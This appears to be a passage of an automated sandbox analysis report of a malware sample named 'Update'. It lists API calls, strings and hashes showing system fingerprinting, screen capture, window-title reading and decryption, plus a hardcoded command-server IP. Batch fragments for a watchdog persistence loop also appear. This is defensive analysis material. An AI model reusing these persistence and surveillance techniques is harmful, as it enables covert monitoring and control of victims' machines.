• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 034E5573
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 034E5587
• GetLastInputInfo.USER32(?), ref: 034E559A
• GetTickCount.KERNEL32 ref: 034E55A0
• wsprintfW.USER32 ref: 034E55D5
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 034E55E8
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 034E55FC
• GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 034E5653
• wsprintfW.USER32 ref: 034E566C
• GetForegroundWindow.USER32 ref: 034E5695
• GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 034E56AC
• lstrlenW.KERNEL32(000008CC), ref: 034E56D3
• lstrlenW.KERNEL32(00000994), ref: 034E5739
• GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 034E57AA
• GetProcAddress.KERNEL32(00000000), ref: 034E57B1
• GetNativeSystemInfo.KERNEL32(?), ref: 034E57C2
• GetSystemInfo.KERNEL32(?), ref: 034E57CD
• wsprintfW.USER32 ref: 034E5806
• GetCurrentProcessId.KERNEL32 ref: 034E5818
• OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 034E582E
• K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 034E584B
• CloseHandle.KERNEL32(03505164), ref: 034E587F
• GetTickCount.KERNEL32 ref: 034E58E9
• __time64.LIBCMT ref: 034E58F8
• __localtime64.LIBCMT ref: 034E592F
• wsprintfW.USER32 ref: 034E5968
• GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 034E597D
• GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 034E598C
• GetCurrentHwProfileW.ADVAPI32(?), ref: 034E5999
  • Part of subcall function 034E80F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 034E8132
  • Part of subcall function 034E80F0: lstrcmpiW.KERNEL32(?,A:\), ref: 034E8166
  • Part of subcall function 034E80F0: lstrcmpiW.KERNEL32(?,B:\), ref: 034E8176
  • Part of subcall function 034E80F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 034E81A6
  • Part of subcall function 034E80F0: lstrlenW.KERNEL32(?), ref: 034E81B7
  • Part of subcall function 034E80F0: __wcsnicmp.LIBCMT ref: 034E81CE
  • Part of subcall function 034E80F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 034E8204
Strings
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
• String ID: %d min$1.0$2024.12.27$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
• API String ID: 1101047656-1105313717
• Opcode ID: b6e0fea18973b0a7d11a964849de86c562518d9679e9dbcf872dc0d14732f90f
• Instruction ID: f98acf1a54c1e6473ae7c668dc1ab5188c8f103f4152e859a83cbca7bf7d8050
• Opcode Fuzzy Hash: b6e0fea18973b0a7d11a964849de86c562518d9679e9dbcf872dc0d14732f90f
• Instruction Fuzzy Hash: 5CF106B5900304AFD720EB64DC45FDB73B8BF44704F00899DE71A9B291EA71AA49CF59
APIs
• GetTempPathA.KERNEL32(00000104,?), ref: 6C377ED6
• _strlen.LIBCMT ref: 6C377EF2
• _strlen.LIBCMT ref: 6C3781F6
• _strlen.LIBCMT ref: 6C3787FD
• _strlen.LIBCMT ref: 6C378A61
• CopyFileA.KERNEL32(6C389F47,?,00000000), ref: 6C378C17
• _strlen.LIBCMT ref: 6C378C7B
• CopyFileA.KERNEL32(00000000,?,00000000), ref: 6C378E42
• _strlen.LIBCMT ref: 6C37848C
  • Part of subcall function 6C3711B0: _strlen.LIBCMT ref: 6C3711E3
• _strlen.LIBCMT ref: 6C378EDD
• OpenProcess.KERNEL32(00000410,00000000,00000000,00000000,?,00000001,00000040,00000001), ref: 6C379143
• CloseHandle.KERNEL32(00000000), ref: 6C37914E
• CreateProcessA.KERNEL32 ref: 6C379199
• _strlen.LIBCMT ref: 6C3791C3
• CloseHandle.KERNEL32(?,?,00000002,00000040,00000001), ref: 6C379417
• CloseHandle.KERNEL32(?), ref: 6C37941F
• std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C37946E
• std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C3794BD
• std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C379596
Strings
• copy /Y "%BackupDLLPath%" "%DLLPath%", xrefs: 6C37872D
• goto CheckProcess, xrefs: 6C3787B9
• timeout /t 30 /nobreak >nul, xrefs: 6C3787A5
• set "DLLPath=, xrefs: 6C378422
• tor., xrefs: 6C3792E7
• set "ProcessName=, xrefs: 6C378151
• if not exist "%DLLPath%" (, xrefs: 6C378705
• copy /Y "%BackupProcessPath%" "%ProcessPath%", xrefs: 6C3786DD
• echo DLL file not found, restoring from backup..., xrefs: 6C378719
• set "BackupProcessPath=, xrefs: 6C3781C3
• start "" "%ProcessPath%", xrefs: 6C37877D
• b7;l, xrefs: 6C378B3E
• tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul, xrefs: 6C378755
• if %ERRORLEVEL% neq 0 (, xrefs: 6C378769
• Failed to create backup DLL. Please check the DLL path: , xrefs: 6C378C2B
• cmd.exe /B /c "%s", xrefs: 6C37899C
• .pid, xrefs: 6C3792DF
• @echo off, xrefs: 6C378129
• if not exist "%ProcessPath%" (, xrefs: 6C3786BB
• set "ProcessPath=, xrefs: 6C378186
• Failed to create backup EXE. Please check the EXE path: , xrefs: 6C378E56
• echo Process file not found, restoring from backup..., xrefs: 6C3786C9
• set "BackupDLLPath=, xrefs: 6C378459
• :CheckProcess, xrefs: 6C37813D
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: _strlen$CloseHandleIos_base_dtorstd::ios_base::_$CopyFileProcess$CreateOpenPathTemp
• String ID: copy /Y "%BackupDLLPath%" "%DLLPath%"$ copy /Y "%BackupProcessPath%" "%ProcessPath%"$ echo DLL file not found, restoring from backup...$ echo Process file not found, restoring from backup...$ start "" "%ProcessPath%"$.pid$:CheckProcess$@echo off$Failed to create backup DLL. Please check the DLL path: $Failed to create backup EXE. Please check the EXE path: $b7;l$cmd.exe /B /c "%s"$goto CheckProcess$if %ERRORLEVEL% neq 0 ($if not exist "%DLLPath%" ($if not exist "%ProcessPath%" ($set "BackupDLLPath=$set "BackupProcessPath=$set "DLLPath=$set "ProcessName=$set "ProcessPath=$tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul$timeout /t 30 /nobreak >nul$tor.
• API String ID: 321380216-3782732667
• Opcode ID: d5a91e81fd8686dbdcfd79bdfa991493bc31a86d3b08f07e7a2b0e33980afebf
• Instruction ID: b159d92b437b9954951729cc14121e34314158e4368adecc40f609fa23b526d3
• Opcode Fuzzy Hash: d5a91e81fd8686dbdcfd79bdfa991493bc31a86d3b08f07e7a2b0e33980afebf
• Instruction Fuzzy Hash: D7E28DB1510B009BE334CF34C884B97B7E5BF95308F144A2DD49A9BB81E779E5498FA2
APIs
• GetNativeSystemInfo.KERNEL32(?), ref: 009104AE
• VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 009104DE
Strings
Memory Dump Source
• Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_910000_Update.jbxd
Similarity
• API ID: AllocInfoNativeSystemVirtual
• String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
• API String ID: 2032221330-2899676511
• Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
• Instruction ID: 86bc1051357685beccbd0120257c84fa0a0f6bcfd03ef05648052a4540d7f5f1
• Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
• Instruction Fuzzy Hash: E4628C316083898FD721CF24C840BABBBE5FFD4704F14492DE5C99B251E7B5A988CB56

Control-flow Graph (function at 34edf10)
APIs
  • Part of subcall function 034F0542: __fassign.LIBCMT ref: 034F0538
• Sleep.KERNEL32(00000000), ref: 034EDF64
• CloseHandle.KERNEL32(00000000), ref: 034EDF91
• GetLocalTime.KERNEL32(?), ref: 034EDFA9
• wsprintfW.USER32 ref: 034EDFE0
• SetUnhandledExceptionFilter.KERNEL32(034E75B0), ref: 034EDFEE
• CloseHandle.KERNEL32(00000000), ref: 034EE007
  • Part of subcall function 034EF707: _malloc.LIBCMT ref: 034EF721
• EnumWindows.USER32(034E5CC0,?), ref: 034EE19D
• Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 034EE1AA
• EnumWindows.USER32(034E5CC0,?), ref: 034EE1BE
• Sleep.KERNEL32(00000BB8), ref: 034EE1F5
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 034EE241
• Sleep.KERNEL32(00000FA0), ref: 034EE2C4
• RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 034EE2EB
• RegQueryValueExW.KERNEL32(?,IpDatespecial,00000000,?,00000000,?), ref: 034EE30B
• CloseHandle.KERNEL32(?), ref: 034EE35D
• Sleep.KERNEL32(000003E8,?,?), ref: 034EE3A4
• WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 034EE3D0
• CloseHandle.KERNEL32(?,?,?), ref: 034EE3D7
• Sleep.KERNEL32(000003E8,?,?), ref: 034EE3E2
• CloseHandle.KERNEL32(?), ref: 034EE400
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?), ref: 034EE425
                                                                                            • CloseHandle.KERNEL32(?,?,?), ref: 034EE42C
                                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 034EE446
                                                                                            • CloseHandle.KERNEL32(?), ref: 034EE464
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandleSleep$EnumObjectSingleWaitWindows$CreateEventExceptionFilterLocalOpenQueryTimeUnhandledValue__fassign_mallocwsprintf
                                                                                            • String ID: %4d.%2d.%2d-%2d:%2d:%2d$134.122.155.39$134.122.155.39$134.122.155.39$134.122.155.39$15091$15091$15092$15093$Console$IpDatespecial
                                                                                            • API String ID: 1511462596-1864220008
                                                                                            • Opcode ID: f9c1933146e498002c2ca5d6f3cc82641d8b6bbd3ea54ec459e5b19e7375fd79
                                                                                            • Instruction ID: 231bdc82aac215e0d13b1ef46bccbcd2e8c1300a39fc1cf1029af23914af9172
                                                                                            • Opcode Fuzzy Hash: f9c1933146e498002c2ca5d6f3cc82641d8b6bbd3ea54ec459e5b19e7375fd79
                                                                                            • Instruction Fuzzy Hash: B0D134B0544301AFD320EF61E889E2FB7A8FBC4705F140E1EF5648B2A4DB72854ADB56

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetDesktopWindow.USER32 ref: 034EBC8F
                                                                                            • GetDC.USER32(00000000), ref: 034EBC9C
                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 034EBCA2
                                                                                            • GetDC.USER32(00000000), ref: 034EBCAD
                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 034EBCBA
                                                                                            • GetDeviceCaps.GDI32(00000000,00000076), ref: 034EBCC2
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 034EBCD3
                                                                                            • GetSystemMetrics.USER32(0000004E), ref: 034EBCF8
                                                                                            • GetSystemMetrics.USER32(0000004F), ref: 034EBD26
                                                                                            • GetSystemMetrics.USER32(0000004C), ref: 034EBD78
                                                                                            • GetSystemMetrics.USER32(0000004D), ref: 034EBD8D
                                                                                            • CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 034EBDA6
                                                                                            • SelectObject.GDI32(?,00000000), ref: 034EBDB4
                                                                                            • SetStretchBltMode.GDI32(?,00000003), ref: 034EBDC0
                                                                                            • GetSystemMetrics.USER32(0000004F), ref: 034EBDCD
                                                                                            • GetSystemMetrics.USER32(0000004E), ref: 034EBDE0
                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,00000000,?,?,?,00000000,?,00000000), ref: 034EBE07
                                                                                            • _memset.LIBCMT ref: 034EBE7A
                                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 034EBE97
                                                                                            • _memset.LIBCMT ref: 034EBEAF
                                                                                              • Part of subcall function 034EF707: _malloc.LIBCMT ref: 034EF721
                                                                                            • DeleteObject.GDI32(?), ref: 034EBF23
                                                                                            • DeleteObject.GDI32(?), ref: 034EBF2D
                                                                                            • ReleaseDC.USER32(00000000,?), ref: 034EBF39
                                                                                            • DeleteObject.GDI32(?), ref: 034EBFDF
                                                                                            • DeleteObject.GDI32(?), ref: 034EBFE9
                                                                                            • ReleaseDC.USER32(00000000,?), ref: 034EBFF5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                                                                                            • String ID: ($6$gfff$gfff
                                                                                            • API String ID: 3293817703-713438465
                                                                                            • Opcode ID: 4bd93c0e8c55fb135cffc949ca1aaefb0d7a18a24bdc99837d5508b96090b101
                                                                                            • Instruction ID: a27f16c6103fcf14f917da0248c3c608b34f3bcb7c95ba0ee434a7b6aa3b5d75
                                                                                            • Opcode Fuzzy Hash: 4bd93c0e8c55fb135cffc949ca1aaefb0d7a18a24bdc99837d5508b96090b101
                                                                                            • Instruction Fuzzy Hash: AFD18BB1D00308AFDB10EFE9E988B9EBBB9FF48300F14452AF505AB250D771A945CB95

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CryptAcquireContextW.ADVAPI32 ref: 6C376806
                                                                                            • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 6C37686C
                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000), ref: 6C37688D
                                                                                            • CryptHashData.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 6C3768F6
                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000004,00000000,00000004,00000000), ref: 6C376921
                                                                                            • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 6C37698E
                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 6C376999
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Crypt$Hash$DataParam$AcquireContextCreateDestroy
                                                                                            • String ID: P~7l$g9;l$o8;l
                                                                                            • API String ID: 2113037386-3094558960
                                                                                            • Opcode ID: 5d89371fb86d8b78ac91747f0b09c49a7b46a5e44087dfae7729b0b941e4d65e
                                                                                            • Instruction ID: 16fd7de293013f1e940ef0a8b72872f42d4fb85b7dde90c5e905f87ce7fd981c
                                                                                            • Opcode Fuzzy Hash: 5d89371fb86d8b78ac91747f0b09c49a7b46a5e44087dfae7729b0b941e4d65e
                                                                                            • Instruction Fuzzy Hash: 6C226AB2E00218AFDF24CFA4CD55BEEBBB9EF49304F144158E405A7B40DB7999488FA5

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 6C376520: CryptStringToBinaryA.CRYPT32(n7l,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6C376570
                                                                                              • Part of subcall function 6C376520: CryptStringToBinaryA.CRYPT32(n7l,00000000,00000001,00000000,00000000,00000000,00000000), ref: 6C37660E
                                                                                            • CryptAcquireContextW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000008), ref: 6C376FCE
                                                                                            • CryptImportKey.ADVAPI32(00000000,00000208,00000014,00000000,00000000,00000000), ref: 6C377024
                                                                                            • CryptSetKeyParam.ADVAPI32(00000000,00000001,00000000,00000000), ref: 6C37703C
                                                                                            • CryptSetKeyParam.ADVAPI32(00000000,00000004,00000001,00000000), ref: 6C377062
                                                                                            • CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?), ref: 6C377123
                                                                                            • CryptDestroyKey.ADVAPI32(00000000), ref: 6C37712E
                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 6C377139
                                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 6C3773FF
                                                                                              • Part of subcall function 6C38D2B3: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?), ref: 6C38D314
                                                                                              • Part of subcall function 6C3726C0: _strlen.LIBCMT ref: 6C372718
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Crypt$BinaryContextParamString$AcquireDecryptDestroyExceptionImportRaiseRelease___std_exception_copy_strlen
                                                                                            • String ID: 49;l$O9;l$Salt$ed__$o8;l
                                                                                            • API String ID: 1577403515-626284685
                                                                                            • Opcode ID: 9e5a80b253a55ca93addfd4c5158a03984231f92f774277d934134f528f7bf04
                                                                                            • Instruction ID: 8d7dcf576de4f544212789a676168a9e0b46af2ea1fbbee8f5b42f1d0c2eab05
                                                                                            • Opcode Fuzzy Hash: 9e5a80b253a55ca93addfd4c5158a03984231f92f774277d934134f528f7bf04
                                                                                            • Instruction Fuzzy Hash: CE22B1B2D112189FEB24CFA4CC55BEDBBB5EF45304F144158E805B7780DB799A488FA1
                                                                                            APIs
                                                                                            • GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 034E8132
                                                                                            • lstrcmpiW.KERNEL32(?,A:\), ref: 034E8166
                                                                                            • lstrcmpiW.KERNEL32(?,B:\), ref: 034E8176
                                                                                            • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 034E81A6
                                                                                            • lstrlenW.KERNEL32(?), ref: 034E81B7
                                                                                            • __wcsnicmp.LIBCMT ref: 034E81CE
                                                                                            • lstrcpyW.KERNEL32(00000AD4,?), ref: 034E8204
                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 034E8228
                                                                                            • lstrcatW.KERNEL32(?,00000000), ref: 034E8233
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                                                                                            • String ID: A:\$B:\
                                                                                            • API String ID: 950920757-1009255891
                                                                                            • Opcode ID: 609fb942140f7099b044aca51659424316474825e1f3de8faa7bb557f16b8591
                                                                                            • Instruction ID: 832e5a59d4f8b0c331383953f6f55889368261c8c262704be7d774b78de36c53
                                                                                            • Opcode Fuzzy Hash: 609fb942140f7099b044aca51659424316474825e1f3de8faa7bb557f16b8591
                                                                                            • Instruction Fuzzy Hash: 3741A571A01218DFDF20EF64DD84AAEB3B8EF44605F04459ADA0AA7240E771DA09CB98
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $'$jIk$6
                                                                                            • API String ID: 0-3404073836
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: $,$jIk$6
                                                                                            • API String ID: 4218353326-1611763776
                                                                                            APIs
                                                                                              • Part of subcall function 034E5320: InterlockedDecrement.KERNEL32(00000008), ref: 034E536F
                                                                                              • Part of subcall function 034E5320: SysFreeString.OLEAUT32(00000000), ref: 034E5384
                                                                                              • Part of subcall function 034E5320: SysAllocString.OLEAUT32(03505148), ref: 034E53D5
                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,?,03505148,034E69A4,03505148,00000000,75BF73E0), ref: 034E67F4
                                                                                            • GetLastError.KERNEL32 ref: 034E67FE
                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 034E6816
                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 034E681D
                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,?,?), ref: 034E683F
                                                                                            • LookupAccountSidW.ADVAPI32(00000000,?,?,00000100,?,00000100,?), ref: 034E6871
                                                                                            • GetLastError.KERNEL32 ref: 034E687B
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 034E68E6
                                                                                            • HeapFree.KERNEL32(00000000), ref: 034E68ED
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocErrorFreeInformationLastProcessStringToken$AccountDecrementInterlockedLookup
                                                                                            • String ID: NONE_MAPPED
                                                                                            • API String ID: 1317816589-2950899194
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNEL32(?,74DEDF80,00000000,75BF73E0), ref: 034E6C8B
                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 034E6CAA
                                                                                            • _memset.LIBCMT ref: 034E6CE1
                                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 034E6CF4
                                                                                            • swprintf.LIBCMT ref: 034E6D39
                                                                                            • swprintf.LIBCMT ref: 034E6D4C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                                                                                            • String ID: %sFree%d Gb $:$@$HDD:%d
                                                                                            • API String ID: 3202570353-3501811827
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: $,$jIk
                                                                                            • API String ID: 4218353326-2946808363
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: $,$jIk
                                                                                            • API String ID: 4218353326-2946808363
                                                                                            APIs
                                                                                            • CreateDXGIFactory.DXGI(0350579C,?,DF800B7B,74DEDF80,00000000,75BF73E0), ref: 034E6F4A
                                                                                            • swprintf.LIBCMT ref: 034E711E
                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 034E71C7
                                                                                            Strings
